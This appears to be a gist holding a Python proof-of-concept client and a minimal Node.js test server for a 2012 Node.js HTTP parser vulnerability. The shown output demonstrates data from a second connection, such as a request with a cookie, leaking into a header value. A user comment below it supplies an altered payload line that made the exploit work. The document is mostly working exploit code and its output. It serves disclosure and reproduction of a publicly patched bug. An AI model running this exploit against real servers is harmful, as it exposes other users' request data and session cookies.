stringptr-update-poc-client.py

#!/usr/bin/env python

import socket
import sys
import time

def round_up(n, r):
    return int((n + r - 1) / r) * r

s = socket.socket()
s.connect(("localhost", 8080))

buf = "GET / HTTP/1.1\r\nHost: localhost\r\nConnection: close\r\nX:\r\n "
s.sendall(buf)
time.sleep(0.1)

s2 = socket.socket()
s2.connect(("localhost", 8080))

buf2 = "This is private data, perhaps an HTTP request with a Cookie in it."
s2.sendall(buf2)
time.sleep(0.1)

s.sendall("A" * (3 + round_up(len(buf), 16) - len(buf) + round_up(len(buf2), 16)) + "\r\n\r\n")

while True:
    b = s.recv(1024)
    if not b:
        break
    sys.stdout.write(b)

stringptr-update-poc-server.js

#!/usr/bin/env node

var http = require('http');

http.createServer(function (req, res) {
  res.writeHead(200, {'Content-Type': 'text/plain'});
  res.end('X header: ' + req.headers['x']);
}).listen(8080);

See http://blog.nodejs.org/2012/05/07/http-server-security-vulnerability-please-upgrade-to-0-6-17/

$ ./node ~/stringptr-update-poc-server.js &
[1] 11801
$ ~/stringptr-update-poc-client.py
HTTP/1.1 200 OK
Content-Type: text/plain
Date: Wed, 18 Apr 2012 00:05:11 GMT
Connection: close
Transfer-Encoding: chunked

64
X header:
 This is private data, perhaps an HTTP request with a Cookie in it.
0

Hey, I was trying to reproduce de vulnerability, and I can't get the "private" data...

I tried a lot of versions from those that was marked as vulnerable, and I couldn't get the data as you did. Is there anything else that I need to know?

Ty in advance ;)

EDIT: I finally got it to work, but in line 24 of stringptr-update-poc-client.py I needed to change it to:
s.sendall("A" * (3 + len(buf2)) + "\r\n\r\n")